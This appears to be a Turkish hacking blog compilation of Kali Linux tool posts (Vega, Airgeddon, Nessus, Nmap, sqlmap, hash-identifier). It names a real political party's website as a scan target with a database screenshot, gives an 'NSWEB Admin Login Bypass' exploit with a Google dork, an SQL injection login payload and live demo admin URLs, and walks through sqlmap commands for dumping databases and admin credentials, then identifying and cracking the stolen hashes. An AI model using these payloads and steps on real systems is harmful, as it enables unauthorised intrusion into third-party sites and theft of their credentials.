-->

Kali Linux Vega Vulnerability Scanner

Selamun Aleyküm ...

Vega, Web Uygulamalarının Güvenliğini Test Etmek İçin Ücretsiz Ve Açık Kaynaklı Bir Tarayıcı, Test Platformudur. Vega, SQL Enjeksiyon, Siteler Arası Komut Dosyası (XSS), Yanlışlıkla Açıklanan Hassas Bilgiler Ve Diğer Güvenlik Açıklarını Bulmanıza Doğrulamanıza Yardımcı Olabilir. Java Tabanlı, GUI Temelli Olarak Yazılmıştır Ve Linux, OS X, Windows Üzerinde Çalışır.

Kaynak: https://subgraph.com/vega/
Hedef: Ermeni Devrimci Federasyonu Parti Websitesi
http://www.parliamentarf.am/

VİDEO: 



Hedef Site DATABASE PRİNTSCREEN

Kali Linux Airgeddon - Easy Wifi Hack


Selamun aleyküm ...

Airgeddon Wifi Hack İçin Tasarlanmış Bır Scriptir Kullanışlı Gayet Güzel Hoşuma Gitti Sizlerle Paylasmak İstedım. Anlatılacak Çok Şeyı Yok Numarasını Yazıyorsun Beklıyorsun. Web Wpa Wpa2 Wps Gıbı Desteklerı War Hatta Ewil Twin Bile Var..
 Video: 





NSWEB Admin Login Bypass

#################################################################################
# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux 2017.1 And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/  
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='

Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/

Greet'Zzz :  Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & S1R

Kali Linux Nessus Kurulumu

Selamun Aleyküm ...

Nessus Nedir ?
Nessus, Linux Camiasında Sıkça Kullanılan, Kapsamlı Bir Güvenlik Açığı Tarama Yazılımıdır. Kişisel Ve Her Tür Kurumsal Olmayan Kullanım İçin Ücretsizdir. Genel Amacı, Bilgisayar Sistemlerinde Ve Bilgisayar Ağlarında Potansiyel Güvenlik Açıklarını Tespit Etmektir.

Nessus Bir Port Tarama Yazılımından Çok Daha Üstün Özelliklere Sahiptir. Nmap Benzeri Yazılımlar Yalnızca Karşıdaki Sunucu Ya Da Makine Hakkında İşletim Sistemi, Açık Port Bilgileri Verebiliyorken Nessus, Servislerdeki Açıkları Eklentilerinin Güncelliğine Bağlı Olarak Test Edebilir. Çalışma Prensibi İstemci/Sunucu Biçimini Kullanır Ve Test Edilecek Sistemde Nessus Sunucu Yazılımının Açık Olması Daha Derinlemesine Test Ve Analiz İmkânı Sunar.
 
Geliştirici(ler):Tenable Network Security
Kararlı sürüm: 4.4 / 2011/08/01
İşletim sistemi : Windows/Linux/*BSD
Tür:Güvenlik Yazılımı
Resmî sitesi:http://www.nessus.org/

Adresinden Sistem Mimariniza Uygun Olanı Bulup Kullanım Sözleşmesini Onaylayip İndiriyoruz.


İndirdikten Sonra Terminalden İndirdiğimiz Dizine Geçiyoruz
cd Dowloands 
ls 
dpkg -i Nessus-6.10.9-debian6_amd64.deb Yazarak Kurulum İşlemine Başlıyoruz.

Bulundugumuz Dizinde
/etc/init.d/nessusd start
yazarak nessus'u başlatıyoruz
Ardından https://TrazeR:8834 Adresıni Tarayıcımızda Açıyoruz
Resim Boyutlari İçin Kusura Bakmayin Yarin Düzenleyeceğim Tekrar.

https://TrazeR:8834 Adresini Tarayicimizda Açıyoruz SSL Sorunu Ve Güvensiz Diyebilir Önemli Değil Devam Ediyoruz Nessus Setup Ekrani Geliyor Buradan Contine Diyoruz.

 Nessus Güvenlik Açığı Tarayıcısıni Kullanmak İçin Bir Yönetici Hesabı Oluşturulmalıdır. Bu Kullanıcı, Kullanıcıları Oluşturma / Silme, Taramaları Durdurma Ve Tarayıcı Yapılandırmasını Değiştirme Yeteneği İle Tarayıcıyı Tam Kontrol Yetkisine Sahiptir.


Kullanici Adimizi Şifremizi Oluşturduktan Sonra Devam Ediyoruz.
Aktivaston İçin Bu ADRESTEN Kayit Oluyoruz Ve Kayit Esnasındaki Mail Adresimize Aktivasyon Kodu Geliyor.

Ve Kurulumun Bitmesi İçin Bekliyoruz.

Kurulum İşlemi Zaman Aliyor Biraz.
Ve Kurulum Tamamlandı Başlangıçda Belirlediğimiz Kullanıcı Adı Ve Şifreyle Giriş Yapıyoruz.

Karşılama Paneli Bu Şekilde Uzun Sürdüğü İçin Sıkıldım Müsait Zamanda Genel Bi Tarama Yapar Konu Altına Eklerim ..





Kalın Sağlıcakla ..

Nmap Kullanimi

Selamun Aleyküm ..
Nmap, bilgisayar ağları uzmanı Gordon Lyon (Fyodor) tarafından geliştirilmiş bir güvenlik tarayıcısıdır. Taranan ağın haritasını çıkarabilir ve ağ makinalarında çalışan servislerin durumlarını, işletim sistemlerini, portların durumlarını gözlemleyebilir.
Nmap kullanarak ağa bağlı herhangi bir bilgisayarın işletim sistemi, çalışan fiziksel aygıt tipleri, çalışma süresi, yazılımların hangi servisleri kullandığı, yazılımların sürüm numaraları, bilgisayarın güvenlik duvarına sahip olup olmadığı, ağ kartının üreticisinin adı gibi bilgiler öğrenilebilmektedir.
Nmap tamamen özgür GPL lisanslı yazılımdır ve istendiği takdirde sitesinin ilgili bölümünden kaynak kodu indirilebilmektedir. Nmap' ın kullanılabildiği işletim sistemleri LinuxWindowsMacOSSolaris, *BSD ve AmigaOS olarak sıralabilir fakat popülerliği öncelikle Linux daha sonrasında Windows' ta dır.
Kaynak : Vikipedia
Nmap herhangi bir istemci veya sunucuyu birçok farklı şekilde tarama yeteneğine sahiptir. Nmap'i güçlü kılan farklı tarama tekniklerine sahip olmasıdır. Protokol temelli (TCP, UDP, vb.) tarama yapılabileceği gibi, belirli aralıklardaki IP adresleri, alt ağlar (subnet) ve üzerlerinde çalışan port ve servisleri de taranabilir.[1]
Tarama sonuçlarında ortaya çıkabilecek port durumları aşağıdaki gibidir :
Open (Açık): Portun erişilebilir durumda olduğunu ve port üzerinde bir uygulamanın TCP bağlantılarını ya da UDP datagramlarını kabul ettiği anlamına gelmektedir.
Closed (Kapalı): Portun erişilebilir olduğunu (Paketleri almakta ve geri paket göndermekte) fakat üzerinde herhangi bir uygulamanın olmadığı anlamını taşımaktadır.
Filtered (Filtreli): Dönen tepkiler bir paket filtreleme mekanizması tarafından engellenir. Nmap portun açık olduğuna karar veremez.
Unfiltered (Filtresiz): Portlar erişilebilir ancak Nmap portların açık veya kapalı olduğuna karar veremez. (Sadece ACK scan için )
Open|filtered (Açık|Filtreli): Nmap portların açık veya filtrelenmiş olduğuna karar veremez. (UDP, IP Protocol, FIN, Null, Xmas Scan için )
Closed|filtered (Kapalı|Filtreli): Nmap portların kapalı ya da filtreli olduğuna karar veremez. (Sadece Idle Scan için )

Nmap Tarama Türleri 
TCP SYN (Half Open) Scan : 
Hedefe TCP SYN gönderilir. Portlarin Kapali Olduğu Durumlarda Hedef Makina VCevağ Olarak RST + ACK Döner.
Portlarin Açık Olduğu Durumlarda İse Hedef Makina SYN + ACK Bayrakli Segment Döndürür. Daha Sonra Kaynak Makina RST Bayrakli Segment Göndererek Bağlantiyi Koparir Ve Böylelijle TCP Üçlü El Sıkışma (TCP Three-Way Handshaking) Tamamlanmaz. Bu Tarama Türünce TCP Üçlü El Sıkışma Gerçekleşmediği İçin Bu Tarama Türü Hedef Sistemlerinde Herhangi Bir Şekilde İz Birakmaz.
Kullanım Şekli : nmap -sS -v hedef_ip_adresi

TCP Connect Scan : 
Kaynak Makinanin Gerçekleştireceği TCP Connet Scan, Kapali Portlara Yapildiği Zaman RST + ACK Bayrakli Segment Dönecektir. Ancak Açık Portlara Yapildiği Durumlarda Hedef Makinanin Göndereceği SYN + ACK Bayrakli Segmenti, Kaynak Makina ACK Bayrakli Segment Göndererek Cevaplar Ve Üçlü El Sıkışmayi Tamamlar.
Kullanım Örneği: nmap -sT -v hedef_ip_adresi

FIN (Stealth) Scan  :
Hedef Makinaya TCP Bağlanti İstegi Olmadan Gönderilen Segmentle Tarama Yapilir. Kaynak Makinanin Göndereceği FIN Bayrakli Segment, Hedef Makinanin Kapali Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Açık Portuna Gelirse Hedef Makinadan Herhangi Bir Tepki Dönmeyecektir.
Kullanım Şekli : nmap -sF -v hedef_ip_adresi

Xmas Scan :
Bu Tarama Türünde Kaynak Bilgisayarin TCP Segmentine, URG,PSH Ve FIN Bayraklarini Set Edeceği ("1" Yapilacaği) Segment Hedef Makinaya Gönderilir. Eğer Kaynak Makinanin Gödereceği URG,PSH Ve FIN Bayrakli Segment, Hedef Makinanin Kapalı Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Bu Tarama Türünde TCP Başlığı İçerisinde Yer Alan Toplam Altı Adaet Bayraktan Üç Tanesi Set Edildiği ("1" yapildiği) İçin, Gönderilen Segment Yılbaşı Ağacının Yanan Lambalarina Benzetilmiştir. Bundan Dolayida  Bu Tarama Türüne Xmas (Christmas) Scan Denmiştir. 
Kullanım Şekli: nmap -sX -v hedef_ip_adresi

Null Scan : 
Hiç Bir Bayrağın Bulunmayacağı Bu Tarama Türü, Gerçek Hayatta Karşımıza Çıkmayan Bir Durumdur. Kaynak Makinan,in Gödereceği Bayraksız Segmentler Karşısında Hedef Makinanin Vereceği Tepkiler FIN Scan İle Aynıdır. Kaynak Makinanın Göndereceği Bayraksız Segment, Hedef Makinanin Kapalı Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Kullanım Şekli : nmap -sN -v hedef_ip_adresi

Ping Scan : 
Bu Tarama Türünda Kaynak Makina Hedef Makinaya Tek Bir ICMP Echo İstek Paketi Gönderir. İP Adresi Erişebilir Ve ICMP Filtreleme Bulunmadığı Sürece, Hedef Makinaya ICMP Echo Cevabi Döndürecektir. Eğerü Hedef Makina Erişilebilir Değilse Veya Paket Filtreleyici ICMP Paketlerini Filtreliyorsa, Hedef Makinadan Herhangi Bir Cevap Dönmeyecektir. 
Kullanım Şekli : nmap -sP -v hedef_ip_adresi

UDP Scan : 
Kaynak Makinanın Hedef Makinaya UDP Datagramina, ICMP Port Unreachable Cevabi Döndürülüyorsa Hedef Makina Kapali Kabul Edilecektir. Herhangi Bir Tepki Döndürmeyen Hedef Makina Open|Filtered Kabul Edilecektir. UDP Datagramiyla Cevap Döndüren Hedef Makinaya Ait Port İse Açık Kabul Edikecektir.
Kullanım  Şekli : nmap -sU -v hedef_ip_adresi

IP Protocol Scan : 
Bu Tarama Türü Standart Nnamp Tarama Türlerinden Biraz Farklidir. Bu Tarama Türünde Hedef Makinalarin Üzerlerinde Çalışan IP Tabanli Protokoller Tespit Edilmektedir. Bu Yüzden Bu Tarama Türüne Tam Anlamiyla Bir Port Taramasi Demek Mümkün Değildir. Hedef Makina Üzerinde Taramasını Yaptığımız İP Protokolü Aktif Haldeyse Makinadan Bu Taramaya Herhangi Bir Cevap Gelmeyecektir. Hedef Makina Üzerinde, Taramasini Yaptıgımız IP Protokolü Aktif Halde Değilse Hedef Makinadan Bu Taramaya, Tarama Yapılan Protokolün Türüne Göre Değişebilen RST Bayrakli (RST Bayraği "1" Yapılmış) Bir Segment Cevap Olarak Gelecektir.
Kullanım Şekli : nmap -sO -v hedef_ip_adresi

ACK Scan : 
Bu Tarama Türünde Kaynak Makina Hedef Makinaya TCP ACK Bayrakli Segment Gönderir. Eğer Hedef Makina ICMP Destination Unreachable Mesajını Dönerse Ya Da Hedef Makinada Bu Taramaya Karşılık Herhangi Bir Tepki Oluşmazsa Port "filtered" Olarak Kabul Edilir. Eğer Hedef Makina RST Bayrakli Segment Döndürürse Port "unfiltered" Kabul Edilir.
Kullanım Şekli : nmap -sA -v hedef_ip_adresi

Window Scan : 
Window Scan, ACK Scan TürüneBenzer Ancak Bir Önemlii Farki Vardir. Window Scan Portlarin Açık Olma Durumlarini Yani "OPEN" Durumlarini Gösterebilir. Bu Taramanin İsmi TCP Windowing İşleminden Gelmektedir. Bazı TCP Yığınlari, RST Baraktli Segmentlere Cevap Döndüreceği Zaman, Kendilerine Özel Window Boyutlari Sağlarlar. Hedef Makinaya Ait Kapali Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sifirdir. Hedef Makinaya Ait Açık Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sıfırdan Farkli Olur.
Kullanım Şekli : nmap -sW -v hedef_ip_adresi

Idle Scan : 
Bu Tarama Türü Kaynak Makinanin Hedef Makinaya Tarama Esnasinda Aktif Olarak Rol Almadığı Bir Türdür. Kaynak Makina "ZOMBİ" Olarak Nitelendirilen Makinalar Üzerinden Hedef Makinayi Tarayarak Bilgi Toplar.
Kullanım Şekli : nmap -sl -v zombi_ip hedef_ip_adresi

Nmap Betik Motoru (Nmap Scripting Engine -NSE)
NSE (Nmap Script Engine) Nmapin En Güçlü Ve Kullanışlı Özelliklerinden Birisidir. NSE'yi Normal Nmap Komutlariyla Yapılamayan Yada Yapılması Çok Zor Olan İşlemlerin Daha Kolay Bir Şekilde Yapılmasının Sağlandığı Bir Betikler Bütünü Olarak Tarif Edebiliriz. Nmap İle Birlikte Bir Çok Betik Kütüphanesi Hazır Olarak Gelmektedir. NSE Kullanılarak Temel Olarak Yapılabilecekler Aşağıda Listelenmiştir.
1) Ağ Keşifleri: Hedef Etki Alanlarının Whois Veri Tabani Sorgulari Yapilabilir. Hedef Sistemlerin SNMP Sorgulari Yapılabilir Ve Mevcut NFS/SMB/RPC Paylaşım Ve Servisleri Listenilebilir.

2) Karmaşık Versiyon Tespiti: Normal Nmap Komutlariyla Hedef Sistemlerin Versiyonlari Belirlenebilmektedir. NSE İle Hedef Sistemlerin Versiyonlari Çok Daha Ayrıntili Bir Şekilde Tespit Edilebilir.
3)  Zafiyet (Vulnerability) Tespiti: Normal Nmap Komurtlariyla Hedef Sistemlerin Zafiyetleri Tam Anlamıyla Tespit Edilememektedir. NSE İle Bu Zafiyetler Daha Kolayca Belirlenebilir. Nmap İle Hazır Gelen Biir Çok Zafiyet Tespit Betiği Bulunmaktadir. Ancak Temel İşlevinin Zafiyet Tarayicisi Olmadığının Bilinmesi Gerekir.
4) Arka Kapi (Backdoor) Tespiti: NSE  Bazi Arka Kapi Programlarinida Tespit Edebilmektedir.
5)  Zafiyet Sömürmesi (Vulnerability Exploitation) NSE İle Sadece Hedef Sistemlerin Zafiyetkeri Tespit Edilmekle Kalmayip Bu Zafiyetlerin Bazıları Kullanilarak Hedef Sistemlere Sızılmasi Mümkün Olmaktadir. Fakat Nmap'in Temel Amaci Metasploit Gibi Bir Zafiyet Sömürü Programina Dönüşmek Değildir. Buna Ragmen NSE İle Hedef Sistemlerdeki Bazi Zafiyetlerin Sömürülmeside Mümkündür.NSE 'nin Geliştirilmesine Devam Edilmektedir.

Nmap Tarama Örneklei : 
nmap -sS -sV -Pn -top-ports 10 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
Top-ports10: En Çok Kullanilan 10 Portu Tara.
nmap -sS -sV -Pn -T4 -p- 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
T4 : Tarama Hizi Hizli Bir Tarama.
-p- : Tüm Portlari Tara
Bu Tarama Çok Uzun Sürdüğü İçin Hazır Taranmış Bir Ekran Görüntüsü Koyuyorum.

nmap -sS -A -Pn -oA sonuclar 51.255.10.187
sS : Syn Taramasi 
A  : Versiyon Ve İşletim Sistemi Bilgisi
Pn : Ping Atma 
oA : 3 Farkli Formatta Tarama Çıktısını Kaydeder.

nmap --script ftp-anon -p 21 51.255.10.187
script : Nmap Scriptlerini Kullanmamizi Sağlar.
ftp-anon : Ftp 'ye Anonim Girişi Olup Olmadıgını Kontrol Eder.
p 21 : Port 21 de Scripti Çalıştırır
Zafiyet Oldugunda 2.ci Komut Satirindaki Gibi Belirtir.

nmap --script http-dombased-xss www.trazer.org
script : Nmap Scriptlerini Kullanmamizi Sağlar.
http-dombased-xss : trazer.org'da xss ara
Couldn't find any DOM based XSS.=
Yani Herhangi Bir Dom Tabanli XSS Bulunamadı :) 

Ek Olarak Nmap İle cloudflare Bypass Yapabilirsiniz. Aslında Bypass Demiyelimde Otomatik Olarak Nmap Aracı İle Hedef Sistemin Dns Üzerindeki Tüm Alan Adlarina Subdomain Vs Brute Force Yapilarak Alt Alan Adlari Tespit Edilip Gerçek İp Adresi Bulunabilir. 
nmap --script dns-brute -sn hedefsite.com

Benim Size Aktarma İstediklerim Bu Kadardı Sizler İçin Sağ Soldan Toparladım Ve Bu Çıktı Ortaya
Umarım Anlaşılır Olmuştur. Nmap Scriptlerini /usr/share/nmap/script/ Klasörü Altında Bulup İnceleyebilirsiniz. Bu Yazımızda Nmap Aracının Çok Kaliteli Bir Keşif Aracı Olduğunu Uygulayip Öğrenmiş Olduk.
Nmap Kullanımı Hakkinda Daha Detayli Bilgi İçin Buradaki Linke Göz Atabilirsiniz.

TrazeR Sunar //

Sqlmap Kullanimi

Selamun Aleyküm ...

Akademi İçin Çektigim Genel Sqlmap Kullanimi,
Daha İyi Anlamanız İçin İşlemleri Numaralandırdım.



Dork Taramasi için:
1 : sqlmap.py  -g "index.php?id=" 

Veritabani Çekmek için :
2: sqlmap.py -u   "http://www.example.com/media.php?id=26"  --dbs
Veritabanındaki Tabloları Çekmek İçin : 
3: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables 
Kolanları Çekmek İçin :
4: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns 
Admin Bilgilerini Çekmek İçin
5: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı Admin,id,pass --dump


Ne Kadar Kısa Tutmaya Çalışsamda Video Uzadi 
Hd İzleyin


Umarım Anlaşılır Ve Yararli Olur.

Kali Linux Virtualbox İnstall

Selamun Aleyküm ..

Vİrtualbox'su Genelde Windowsa Kurar Üstüne Sanal Olarak Linux Kurup Kullanırız. Bu Gün O Alışıla Gelmiş Adeti Bozuyorum :) Tam Tersini Yapıcaz Linuxsa VirtualBox Kurup, Sanal Olarak Windows Kuracağız..
 Benim Gibi Sistemi Komple Linux Tabanlı Olan Arkadaşlar İçin İdeal Bi Konu Olacağını Düşündüğüm İçin Bu Konuyu Hazırlıyorum .. 

/etc/apt/ Dizininde Bulununan Sources.list Dosyamızı Açıp Aşağidaki Komutu Ekliyoruz.
Deb http://download.virtualbox.org/virtualbox/debian yakkety contrib


Ekleyip Kayıt Edip Çiktiktan Sonra apt-get update Komutuyla Güncelliyoruz


Ardindan  apt-get install virtualbox-5.1 Komutunu Girip Kuruyoruz.


Evet KurulumAşamasi Bitti 
Şİmdi Yan Menüde Bulunan Uygulamalari Göster Kısmına Virtual Yazarak Virtualboxsu Açıyoruz

Ve Linuxda Virtualboxsa Hoş Geldiniz :) 



Gerisini Siz Biliyosunuz ;)

TrazeR Sunar //

Kali Linux Hash-İdentifier

Selamun Aleyküm .. 

Bugun Sizlere Bi Çoğunuzun Bildiği, Yada Bilmediği, Yadaaa İlk Kez Adını Duyduğu  Hash-İdentifier 'den Bahsedeceğim.
 Aslına Bakarsanız Çok Anlatılacak Bahsedelicek Bi Durum Yok hash-identifier Şifreleme Türünü Tespit Etmeye Yarayan Bir Araçtır
Örnek Vericek Olursak; Sql İncektion Açığıyla Veritabanindan Bilgi Süzdünüz Admin Bilgisi Hash Olarak Geldi.. 
Nabıyoruz Hemen Hashkiller 'e Yada O Tarz Sitelere Girip MD5 Olarak Decode Etmeye Çalışıyoruz. Bazen Kırıyo Bazen Kıramıyor.
 Süzülen Bilginin MD5 Oldugunu Nerden Biliyoruz ? Bilmiyoruz Çünki Ezbere Giriyoz.

Linuxda Terminal Açıp
hash-identifier 
Yazıp Açıyoruz

Aracımız Açıldı 
HASH: 
Kısmına Şifrelenmiş Metni Girip Entarlıyoruz Bu Kadar
*EF9AC024048F2530A59240C62CC218EC8DA28D94


Hash Degerını Gırdık Taakkk Şifreleme Türünü Ve Algoritmasini Verdi 
MySQL 160bit - SHA-1 (SHA-1 ($pass))

Hash Türünü Tespit Ettikten Sonra Brute Force İşine Başlayalabiliriz.

Hash İdentifier Desteklenen Şifreleme Biçimleri Aşağidaki Gibidir :

  • ADLER-32
  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192 110080 ,Haval-224 114080 ,Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(Wordpress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 - SHA-1(SHA-1($pass))
  • MySQL 160bit - SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • And more…



Bu Arada Yukaradaki Hashin Çözülmüş Hali Aşağidadir.

Hash                           Type           Result
*EF9AC024048F2530A59240C62CC218EC8DA28D94 MySQL4.1+ freestuff

TrazeR Sunar //